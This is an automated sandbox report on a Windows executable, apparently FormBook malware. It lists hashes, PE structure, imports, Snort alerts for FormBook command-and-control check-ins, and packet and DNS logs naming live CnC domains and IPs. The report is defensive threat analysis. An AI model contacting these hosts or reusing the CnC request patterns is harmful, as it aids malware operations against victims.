                                            161.35.25.247
                                            		unknownUnited States
                                            		14061DIGITALOCEAN-ASNUStrue
                                            18.209.115.26
                                            		unknownUnited States
                                            		14618AMAZON-AESUStrue

                                            Private

                                            IP
                                            192.168.2.1

                                            General Information

                                            Joe Sandbox Version:31.0.0 Red Diamond
                                            Analysis ID:339369
                                            Start date:13.01.2021
                                            Start time:21:45:49
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 10m 8s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:RRW9901200241.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:21
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@7/0@6/4
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 14.3% (good quality ratio 13.4%)
                                            • Quality average: 74.7%
                                            • Quality standard deviation: 29.2%
                                            HCA Information:
                                            • Successful, ratio: 96%
                                            • Number of executed functions: 48
                                            • Number of non-executed functions: 246
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .exe
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                            • Excluded IPs from analysis (whitelisted): 40.88.32.150, 13.88.21.125, 104.43.139.144, 51.104.144.132, 92.122.213.247, 92.122.213.194, 8.248.149.254, 8.253.95.249, 8.253.204.121, 67.26.75.254, 67.26.137.254, 51.103.5.159, 52.155.217.156, 20.54.26.129, 23.210.248.85, 51.104.139.180, 173.194.79.121
                                            • Excluded domains from analysis (whitelisted): ghs.google.com, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net

                                            Simulations

                                            Behavior and APIs

                                            No simulations

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            112.213.89.130RTV900021234.exeGet hashmaliciousBrowse
                                            • www.unitvn.com/krc/?APX87P=yIa+94l9rzehTYM3PiVfcRiVsqTAPcUdvzwZbg1xcjwMDM0Vsi/KUjipuEqEfCN0H+g6&LZiH=ypqh5Rq0KFKhz8cp
                                            18.209.115.26payment slip-002044040440.exeGet hashmaliciousBrowse
                                            • www.1250northdearbornst4c.info/2igt/?uR-l4=3NdSt4Dbtj7cU1//BbJElqvuZBmTz68+ScaJlk7V93PW9Am25GCoyfUNEI1BqDLJxCBl&IhQ0qf=9rUDXL508DA

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            www.unitvn.comRTV900021234.exeGet hashmaliciousBrowse
                                            • 112.213.89.130

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            SUPERDATA-AS-VNSUPERDATA-VNH56P7iDwnJ.docGet hashmaliciousBrowse
                                            • 112.213.89.42
                                            RTV900021234.exeGet hashmaliciousBrowse
                                            • 112.213.89.130
                                            sample.exeGet hashmaliciousBrowse
                                            • 112.213.89.101
                                            December Po034333.exeGet hashmaliciousBrowse
                                            • 45.117.169.19
                                            bin.exeGet hashmaliciousBrowse
                                            • 103.7.41.23
                                            New inquiry CMSalgmN0 200000872525_pdf.exeGet hashmaliciousBrowse
                                            • 103.252.254.111
                                            NOAH FORMBUK_crypted.exeGet hashmaliciousBrowse
                                            • 112.213.89.96
                                            Quotation.exeGet hashmaliciousBrowse
                                            • 112.213.89.38
                                            https://contentsxx.xsrv.jp/academia/parts_service/7xg/Get hashmaliciousBrowse
                                            • 112.213.89.144
                                            PAYMENT SWIFT COPY.exeGet hashmaliciousBrowse
                                            • 112.213.92.150
                                            REQUEST FOR QUOTATION FILE.exeGet hashmaliciousBrowse
                                            • 112.213.92.150
                                            IMG_000924677656765_0025676544.exeGet hashmaliciousBrowse
                                            • 112.213.92.150
                                            WIRE TRANSFER COPY _JPG_.exeGet hashmaliciousBrowse
                                            • 112.213.92.150
                                            WIRE REMITTANCE SLIP.exeGet hashmaliciousBrowse
                                            • 112.213.92.150
                                            PAYMENT SWIFT COPY.exeGet hashmaliciousBrowse
                                            • 112.213.92.150
                                            http://617pg.com/sites/pfCaonVGet hashmaliciousBrowse
                                            • 112.213.89.121
                                            New Order.exeGet hashmaliciousBrowse
                                            • 45.117.170.2
                                            PO# 08272020Ex.docGet hashmaliciousBrowse
                                            • 112.213.89.42
                                            Dokumente_2020_08.docGet hashmaliciousBrowse
                                            • 112.213.89.89
                                            I51QkD14Ap.docGet hashmaliciousBrowse
                                            • 112.213.89.143
                                            AMAZON-AESUSChrome.exeGet hashmaliciousBrowse
                                            • 3.83.71.222
                                            orden pdf.exeGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            Matrix.exeGet hashmaliciousBrowse
                                            • 54.234.205.119
                                            YvGnm93rap.exeGet hashmaliciousBrowse
                                            • 54.208.77.124
                                            0113_1010932681.docGet hashmaliciousBrowse
                                            • 184.73.247.141
                                            0113_203089882.docGet hashmaliciousBrowse
                                            • 50.19.243.236
                                            0113_88514789.docGet hashmaliciousBrowse
                                            • 54.235.83.248
                                            W0rd.dllGet hashmaliciousBrowse
                                            • 23.21.140.41
                                            W0rd.dllGet hashmaliciousBrowse
                                            • 184.73.247.141
                                            Order_00009.xlsxGet hashmaliciousBrowse
                                            • 35.172.94.1
                                            PO85937758859777.xlsxGet hashmaliciousBrowse
                                            • 52.201.79.206
                                            IMG_2021_01_13_1_RFQ_PO_1832938.docGet hashmaliciousBrowse
                                            • 54.224.10.186
                                            0113_35727287.docGet hashmaliciousBrowse
                                            • 184.73.247.141
                                            W0rd.dllGet hashmaliciousBrowse
                                            • 54.243.119.179
                                            0fiasS.dllGet hashmaliciousBrowse
                                            • 54.243.119.179
                                            01_extracted.exeGet hashmaliciousBrowse
                                            • 184.73.247.141
                                            DHL_Jan 2021 at 1.M_9B78290_PDF.exeGet hashmaliciousBrowse
                                            • 23.21.252.4
                                            QUOTE_98876_566743_233.exeGet hashmaliciousBrowse
                                            • 52.20.197.7
                                            20210111 Virginie.exeGet hashmaliciousBrowse
                                            • 52.202.22.6
                                            DHL_Jan 2021 at 13M_9B7290_PDF.exeGet hashmaliciousBrowse
                                            • 54.243.164.148
                                            DIGITALOCEAN-ASNUSByrnes Gould PLLC.odtGet hashmaliciousBrowse
                                            • 178.128.131.91
                                            pHUWiFd56t.exeGet hashmaliciousBrowse
                                            • 107.170.138.56
                                            Project review_Pdf.exeGet hashmaliciousBrowse
                                            • 128.199.234.84
                                            Consignment Details.exeGet hashmaliciousBrowse
                                            • 161.35.147.117
                                            btVnDhh5K7.exeGet hashmaliciousBrowse
                                            • 167.71.226.205
                                            0XrD9TsGUr.exeGet hashmaliciousBrowse
                                            • 107.170.138.56
                                            RFQ 41680.xlsxGet hashmaliciousBrowse
                                            • 178.62.58.5
                                            Doc.docGet hashmaliciousBrowse
                                            • 178.128.68.22
                                            mobdro.apkGet hashmaliciousBrowse
                                            • 142.93.74.196
                                            mobdro.apkGet hashmaliciousBrowse
                                            • 142.93.74.196
                                            Test.HTMGet hashmaliciousBrowse
                                            • 159.89.4.250
                                            Doc.docGet hashmaliciousBrowse
                                            • 167.71.148.58
                                            Electronic form.docGet hashmaliciousBrowse
                                            • 157.245.123.197
                                            ______.docGet hashmaliciousBrowse
                                            • 188.166.207.182
                                            ______.docGet hashmaliciousBrowse
                                            • 188.166.207.182
                                            http://landerer.wellwayssaustralia.com/r/?id=kl522318,Z185223,I521823&rd=www.electriccollisionrepair.com/236:52%20PMt75252n2021?e=#landerer@doriltoncapital.comGet hashmaliciousBrowse
                                            • 5.101.110.225
                                            info.docGet hashmaliciousBrowse
                                            • 138.197.99.250
                                            JI35907_2020.docGet hashmaliciousBrowse
                                            • 178.128.68.22
                                            http://46.101.152.151/?email=michael.little@austalusa.comGet hashmaliciousBrowse
                                            • 46.101.152.151
                                            http://search.hwatchtvnow.coGet hashmaliciousBrowse
                                            • 82.196.7.246

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            No created / dropped files found

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.637869354827877
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:RRW9901200241.exe
                                            File size:333312
                                            MD5:61ffb4ad4721f51413075923b2e9468d
                                            SHA1:aa9ca98955157ca28bdbb1d8d29c3d1af2e28023
                                            SHA256:546e873e9e746eeee9cbed391ff7463ce192091ee0ff51c076291da5d836f64f
                                            SHA512:fe49b3771c704c8ab65cb7eb54e6a6e29abb96d0f6e2a9e1d3838d99370d2d868b51111a4ff5e04b181c1f12f42a296a56c5a1e3afb4fa05540ae632d592dbd7
                                            SSDEEP:6144:N19ayEbgUCAOTYANcqIW2yny6uvfb+OYITDbJZyA4JDh17ZST0b+caI:39ay0grp2yn16fb+OBXiDJ9VZGKcI
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........tj.m'j.m'j.m'.Q.'k.m'.4.'I.m'.4.'r.m'.4.'..m'j.l'..m'...'..m'M7.'k.m'M7.'k.m'M7.'k.m'Richj.m'................PE..L......_...

                                            File Icon

                                            Icon Hash:00828e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x408847
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                            DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x5FFEB19F [Wed Jan 13 08:38:55 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:6
                                            OS Version Minor:0
                                            File Version Major:6
                                            File Version Minor:0
                                            Subsystem Version Major:6
                                            Subsystem Version Minor:0
                                            Import Hash:e7da020c2fad0c59a3d5e97971484548

                                            Entrypoint Preview

                                            Instruction
                                            call 00007FE7ACDB62F1h
                                            jmp 00007FE7ACDAEF55h
                                            push 00000014h
                                            push 0041D838h
                                            call 00007FE7ACDAF7F8h
                                            call 00007FE7ACDB26A6h
                                            movzx esi, ax
                                            push 00000002h
                                            call 00007FE7ACDB6284h
                                            pop ecx
                                            mov eax, 00005A4Dh
                                            cmp word ptr [00400000h], ax
                                            je 00007FE7ACDAEF56h
                                            xor ebx, ebx
                                            jmp 00007FE7ACDAEF85h
                                            mov eax, dword ptr [0040003Ch]
                                            cmp dword ptr [eax+00400000h], 00004550h
                                            jne 00007FE7ACDAEF3Dh
                                            mov ecx, 0000010Bh
                                            cmp word ptr [eax+00400018h], cx
                                            jne 00007FE7ACDAEF2Fh
                                            xor ebx, ebx
                                            cmp dword ptr [eax+00400074h], 0Eh
                                            jbe 00007FE7ACDAEF5Bh
                                            cmp dword ptr [eax+004000E8h], ebx
                                            setne bl
                                            mov dword ptr [ebp-1Ch], ebx
                                            call 00007FE7ACDB3693h
                                            test eax, eax
                                            jne 00007FE7ACDAEF5Ah
                                            push 0000001Ch
                                            call 00007FE7ACDAF025h
                                            pop ecx
                                            call 00007FE7ACDB3CFCh
                                            test eax, eax
                                            jne 00007FE7ACDAEF5Ah
                                            push 00000010h
                                            call 00007FE7ACDAF014h
                                            pop ecx
                                            call 00007FE7ACDB2438h
                                            and dword ptr [ebp-04h], 00000000h
                                            call 00007FE7ACDB0BD3h
                                            call dword ptr [004180C8h]
                                            mov dword ptr [00424080h], eax
                                            call 00007FE7ACDB62E2h
                                            mov dword ptr [00422284h], eax
                                            call 00007FE7ACDB5EE3h
                                            test eax, eax
                                            jns 00007FE7ACDAEF5Ah
                                            push 00000008h
                                            call 00007FE7ACDADB0Ah
                                            pop ecx
                                            call 00007FE7ACDB60FFh

                                            Rich Headers

                                            Programming Language:
                                            • [LNK] VS2012 build 50727
                                            • [RES] VS2012 build 50727
                                            • [ C ] VS2012 build 50727

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1db940xdc.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x250000x1a78.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x270000x114c.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1d6e00x40.rdata
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x180000x1c8.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x16d3a0x16e00False0.570835467896data6.67299232216IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rdata0x180000x64f80x6600False0.572150735294data6.01720541218IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x1f0000x50980x3400False0.285456730769data4.69747681351IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                            .rsrc0x250000x1a780x1c00False0.9462890625data7.76883960412IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x270000x17980x1800False0.608561197917data5.57094653631IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            RT_RCDATA0x250700x1a05dataEnglishUnited States

                                            Imports

                                            DLLImport
                                            KERNEL32.dllRaiseException, ReadConsoleW, ReadFile, CreateFileW, WriteConsoleW, GetStringTypeW, LCMapStringEx, SetConsoleCursorPosition, LoadLibraryW, GetModuleHandleW, HeapReAlloc, HeapSize, OutputDebugStringW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, SetStdHandle, WideCharToMultiByte, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetProcessHeap, HeapAlloc, GetStdHandle, GetTickCount64, GetSystemTimeAsFileTime, QueryPerformanceCounter, GetModuleFileNameA, GetCurrentThreadId, SetLastError, GetCPInfo, GetOEMCP, GetACP, EncodePointer, DecodePointer, GetLastError, InterlockedDecrement, ExitProcess, GetModuleHandleExW, GetProcAddress, AreFileApisANSI, MultiByteToWideChar, GetLocalTime, GetCommandLineA, IsDebuggerPresent, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, CloseHandle, HeapFree, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetFileType, DeleteCriticalSection, InitOnceExecuteOnce, GetStartupInfoW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, GetCurrentProcess, TerminateProcess, WriteFile, GetModuleFileNameW, Sleep, LoadLibraryExW, InterlockedIncrement, IsValidCodePage, SetEndOfFile
                                            msi.dll
                                            loadperf.dllLoadPerfCounterTextStringsA, UnloadPerfCounterTextStringsW, UnloadPerfCounterTextStringsA
                                            MSVFW32.dllStretchDIB
                                            AVIFIL32.dllAVIFileExit, AVIStreamReadData
                                            pdh.dllPdhEnumObjectsW, PdhSetQueryTimeRange, PdhGetDllVersion
                                            WSOCK32.dllWSASetBlockingHook, WSACancelAsyncRequest, bind, ord1104, ord1108, ord1130
                                            GDI32.dllStartDocW, GdiGetSpoolFileHandle, PolyBezier
                                            MAPI32.dll
                                            MSACM32.dllacmDriverPriority, acmFilterTagDetailsA

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            01/13/21-21:48:09.018441TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.6161.35.25.247
                                            01/13/21-21:48:09.018441TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.6161.35.25.247
                                            01/13/21-21:48:09.018441TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.6161.35.25.247

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 13, 2021 21:47:46.360791922 CET4974680192.168.2.618.209.115.26
                                            Jan 13, 2021 21:47:46.488919020 CET804974618.209.115.26192.168.2.6
                                            Jan 13, 2021 21:47:46.489022970 CET4974680192.168.2.618.209.115.26
                                            Jan 13, 2021 21:47:46.489367962 CET4974680192.168.2.618.209.115.26
                                            Jan 13, 2021 21:47:46.616822958 CET804974618.209.115.26192.168.2.6
                                            Jan 13, 2021 21:47:46.651639938 CET804974618.209.115.26192.168.2.6
                                            Jan 13, 2021 21:47:46.651665926 CET804974618.209.115.26192.168.2.6
                                            Jan 13, 2021 21:47:46.651837111 CET4974680192.168.2.618.209.115.26
                                            Jan 13, 2021 21:47:46.651880026 CET4974680192.168.2.618.209.115.26
                                            Jan 13, 2021 21:47:46.779654980 CET804974618.209.115.26192.168.2.6
                                            Jan 13, 2021 21:48:08.976949930 CET4974880192.168.2.6161.35.25.247
                                            Jan 13, 2021 21:48:09.017882109 CET8049748161.35.25.247192.168.2.6
                                            Jan 13, 2021 21:48:09.018162012 CET4974880192.168.2.6161.35.25.247
                                            Jan 13, 2021 21:48:09.018440962 CET4974880192.168.2.6161.35.25.247
                                            Jan 13, 2021 21:48:09.058419943 CET8049748161.35.25.247192.168.2.6
                                            Jan 13, 2021 21:48:09.058456898 CET8049748161.35.25.247192.168.2.6
                                            Jan 13, 2021 21:48:09.058465004 CET8049748161.35.25.247192.168.2.6
                                            Jan 13, 2021 21:48:09.058763981 CET4974880192.168.2.6161.35.25.247
                                            Jan 13, 2021 21:48:09.058902025 CET4974880192.168.2.6161.35.25.247
                                            Jan 13, 2021 21:48:09.098886013 CET8049748161.35.25.247192.168.2.6
                                            Jan 13, 2021 21:49:10.731152058 CET4975580192.168.2.6112.213.89.130
                                            Jan 13, 2021 21:49:10.974504948 CET8049755112.213.89.130192.168.2.6
                                            Jan 13, 2021 21:49:10.974662066 CET4975580192.168.2.6112.213.89.130
                                            Jan 13, 2021 21:49:10.974819899 CET4975580192.168.2.6112.213.89.130
                                            Jan 13, 2021 21:49:11.218736887 CET8049755112.213.89.130192.168.2.6
                                            Jan 13, 2021 21:49:11.219010115 CET8049755112.213.89.130192.168.2.6
                                            Jan 13, 2021 21:49:11.219032049 CET8049755112.213.89.130192.168.2.6
                                            Jan 13, 2021 21:49:11.219048023 CET8049755112.213.89.130192.168.2.6
                                            Jan 13, 2021 21:49:11.219305992 CET4975580192.168.2.6112.213.89.130
                                            Jan 13, 2021 21:49:11.219439983 CET4975580192.168.2.6112.213.89.130
                                            Jan 13, 2021 21:49:11.463022947 CET8049755112.213.89.130192.168.2.6

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 13, 2021 21:46:35.689513922 CET6026153192.168.2.68.8.8.8
                                            Jan 13, 2021 21:46:35.737133980 CET53602618.8.8.8192.168.2.6
                                            Jan 13, 2021 21:46:36.498744011 CET5606153192.168.2.68.8.8.8
                                            Jan 13, 2021 21:46:36.546652079 CET53560618.8.8.8192.168.2.6
                                            Jan 13, 2021 21:46:37.325687885 CET5833653192.168.2.68.8.8.8
                                            Jan 13, 2021 21:46:37.376445055 CET53583368.8.8.8192.168.2.6
                                            Jan 13, 2021 21:46:38.430398941 CET5378153192.168.2.68.8.8.8
                                            Jan 13, 2021 21:46:38.478130102 CET53537818.8.8.8192.168.2.6
                                            Jan 13, 2021 21:46:39.249034882 CET5406453192.168.2.68.8.8.8
                                            Jan 13, 2021 21:46:39.308801889 CET53540648.8.8.8192.168.2.6
                                            Jan 13, 2021 21:46:40.519951105 CET5281153192.168.2.68.8.8.8
                                            Jan 13, 2021 21:46:40.570771933 CET53528118.8.8.8192.168.2.6
                                            Jan 13, 2021 21:46:41.302488089 CET5529953192.168.2.68.8.8.8
                                            Jan 13, 2021 21:46:41.359087944 CET53552998.8.8.8192.168.2.6
                                            Jan 13, 2021 21:46:42.295033932 CET6374553192.168.2.68.8.8.8
                                            Jan 13, 2021 21:46:42.345844984 CET53637458.8.8.8192.168.2.6
                                            Jan 13, 2021 21:46:44.055450916 CET5005553192.168.2.68.8.8.8
                                            Jan 13, 2021 21:46:44.103316069 CET53500558.8.8.8192.168.2.6
                                            Jan 13, 2021 21:46:45.024713039 CET6137453192.168.2.68.8.8.8
                                            Jan 13, 2021 21:46:45.075690031 CET53613748.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:05.041726112 CET5033953192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:05.089576960 CET53503398.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:18.093296051 CET6330753192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:18.151318073 CET53633078.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:23.192512035 CET4969453192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:23.243278980 CET53496948.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:24.582165003 CET5498253192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:24.648821115 CET53549828.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:31.226372004 CET5001053192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:31.284768105 CET53500108.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:37.087724924 CET6371853192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:37.147120953 CET53637188.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:37.889822960 CET6211653192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:37.946158886 CET53621168.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:38.517600060 CET6381653192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:38.576761007 CET53638168.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:38.998594046 CET5501453192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:39.058088064 CET53550148.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:39.576025009 CET6220853192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:39.636415958 CET53622088.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:40.263968945 CET5757453192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:40.277487993 CET5181853192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:40.312587976 CET53575748.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:40.378937006 CET53518188.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:41.109539986 CET5662853192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:41.165824890 CET53566288.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:42.006177902 CET6077853192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:42.062701941 CET53607788.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:42.910536051 CET5379953192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:42.961646080 CET53537998.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:43.443485975 CET5468353192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:43.491538048 CET53546838.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:46.268156052 CET5932953192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:46.354010105 CET53593298.8.8.8192.168.2.6
                                            Jan 13, 2021 21:48:08.906971931 CET6402153192.168.2.68.8.8.8
                                            Jan 13, 2021 21:48:08.975737095 CET53640218.8.8.8192.168.2.6
                                            Jan 13, 2021 21:48:10.290030003 CET5612953192.168.2.68.8.8.8
                                            Jan 13, 2021 21:48:10.346292019 CET53561298.8.8.8192.168.2.6
                                            Jan 13, 2021 21:48:14.588618040 CET5817753192.168.2.68.8.8.8
                                            Jan 13, 2021 21:48:14.636603117 CET53581778.8.8.8192.168.2.6
                                            Jan 13, 2021 21:48:29.235683918 CET5070053192.168.2.68.8.8.8
                                            Jan 13, 2021 21:48:29.601576090 CET53507008.8.8.8192.168.2.6
                                            Jan 13, 2021 21:48:31.663353920 CET5406953192.168.2.68.8.8.8
                                            Jan 13, 2021 21:48:31.735148907 CET53540698.8.8.8192.168.2.6
                                            Jan 13, 2021 21:48:34.872498989 CET6117853192.168.2.68.8.8.8
                                            Jan 13, 2021 21:48:34.920453072 CET53611788.8.8.8192.168.2.6
                                            Jan 13, 2021 21:48:49.786048889 CET5701753192.168.2.68.8.8.8
                                            Jan 13, 2021 21:48:50.009089947 CET53570178.8.8.8192.168.2.6
                                            Jan 13, 2021 21:49:10.424647093 CET5632753192.168.2.68.8.8.8
                                            Jan 13, 2021 21:49:10.729964972 CET53563278.8.8.8192.168.2.6
                                            Jan 13, 2021 21:49:31.368076086 CET5024353192.168.2.68.8.8.8
                                            Jan 13, 2021 21:49:31.721117973 CET53502438.8.8.8192.168.2.6

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Jan 13, 2021 21:47:46.268156052 CET192.168.2.68.8.8.80xc3a2Standard query (0)www.7852bigbucktrail.infoA (IP address)IN (0x0001)
                                            Jan 13, 2021 21:48:08.906971931 CET192.168.2.68.8.8.80x365bStandard query (0)www.toastxpress.comA (IP address)IN (0x0001)
                                            Jan 13, 2021 21:48:29.235683918 CET192.168.2.68.8.8.80x22bStandard query (0)www.grayfoxden.comA (IP address)IN (0x0001)
                                            Jan 13, 2021 21:48:49.786048889 CET192.168.2.68.8.8.80x20dfStandard query (0)www.catatan-matematika.comA (IP address)IN (0x0001)
                                            Jan 13, 2021 21:49:10.424647093 CET192.168.2.68.8.8.80x8ffcStandard query (0)www.unitvn.comA (IP address)IN (0x0001)
                                            Jan 13, 2021 21:49:31.368076086 CET192.168.2.68.8.8.80xe3eaStandard query (0)www.monkeytrivia.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Jan 13, 2021 21:47:46.354010105 CET8.8.8.8192.168.2.60xc3a2No error (0)www.7852bigbucktrail.info7852bigbucktrail.infoCNAME (Canonical name)IN (0x0001)
                                            Jan 13, 2021 21:47:46.354010105 CET8.8.8.8192.168.2.60xc3a2No error (0)7852bigbucktrail.info18.209.115.26A (IP address)IN (0x0001)
                                            Jan 13, 2021 21:47:46.354010105 CET8.8.8.8192.168.2.60xc3a2No error (0)7852bigbucktrail.info18.208.10.167A (IP address)IN (0x0001)
                                            Jan 13, 2021 21:47:46.354010105 CET8.8.8.8192.168.2.60xc3a2No error (0)7852bigbucktrail.info18.210.178.226A (IP address)IN (0x0001)
                                            Jan 13, 2021 21:48:08.975737095 CET8.8.8.8192.168.2.60x365bNo error (0)www.toastxpress.com161.35.25.247A (IP address)IN (0x0001)
                                            Jan 13, 2021 21:48:50.009089947 CET8.8.8.8192.168.2.60x20dfNo error (0)www.catatan-matematika.comghs.google.comCNAME (Canonical name)IN (0x0001)
                                            Jan 13, 2021 21:49:10.729964972 CET8.8.8.8192.168.2.60x8ffcNo error (0)www.unitvn.com112.213.89.130A (IP address)IN (0x0001)
                                            Jan 13, 2021 21:49:31.721117973 CET8.8.8.8192.168.2.60xe3eaNo error (0)www.monkeytrivia.com156.238.82.35A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

